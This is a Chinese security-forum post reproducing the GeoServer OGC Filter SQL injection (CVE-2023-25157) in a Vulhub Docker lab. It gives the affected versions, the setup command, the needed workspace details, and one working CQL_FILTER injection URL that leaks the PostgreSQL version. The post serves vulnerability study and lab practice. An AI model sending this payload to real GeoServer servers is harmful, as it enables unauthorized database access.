问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
GeoServer OGC Filter SQL注入漏洞(CVE-2023-25157)
# GeoServer OGC Filter SQL注入漏洞(CVE-2023-25157) GeoServer 是 OpenGIS Web 服务器规范的 J2EE 实现,利用 GeoServer 可以方便的发布地图数据,允许用户对特征数据进行更新、删除、插...
GeoServer OGC Filter SQL注入漏洞(CVE-2023-25157) ============================================ GeoServer 是 OpenGIS Web 服务器规范的 J2EE 实现,利用 GeoServer 可以方便的发布地图数据,允许用户对特征数据进行更新、删除、插入操作。 在版本2.22.1和2.21.4及以前,多个OGC表达式中均存在SQL注入漏洞。 参考链接: - <https://github.com/murataydemir/CVE-2023-25157-and-CVE-2023-25158> - <https://github.com/advisories/GHSA-7g5f-wrx8-5ccf> 漏洞环境 ---- 执行如下命令启动一个GeoServer 2.22.1: ```php docker compose up -d ``` 环境启动后,访问`http://your-ip:8080/geoserver`即可查看到GeoServer的首页。 漏洞复现 ---- 在利用漏洞前,需要目标服务器中存在类型是PostGIS的数据空间(datastore)和工作空间(workspace)。在Vulhub中,已经包含满足条件的工作空间,其信息如下: - Workspace name: `vulhub` - Data store name: `pg` - Feature type (table) name: `example` - One of attribute from feature type: `name` 利用这些已知参数,发送如下URL即可触发SQL注入漏洞: ```php http://your-ip:8080/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=vulhub:example&CQL_FILTER=strStartsWith%28name%2C%27x%27%27%29+%3D+true+and+1%3D%28SELECT+CAST+%28%28SELECT+version()%29+AS+integer%29%29+--+%27%29+%3D+true ``` ![](https://shs3.b.qianxin.com/butian_public/f9265724fa6598104cdede3d30e8e6f2679829b9f322a.jpg) 可见,已经使用SQL注入获取到了目标服务器PostgreSQL的版本。
发表于 2024-07-12 18:50:55
阅读 ( 1257 )
分类:
Web应用
0 推荐
收藏
0 条评论
请先
登录
后评论
带头大哥
456 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!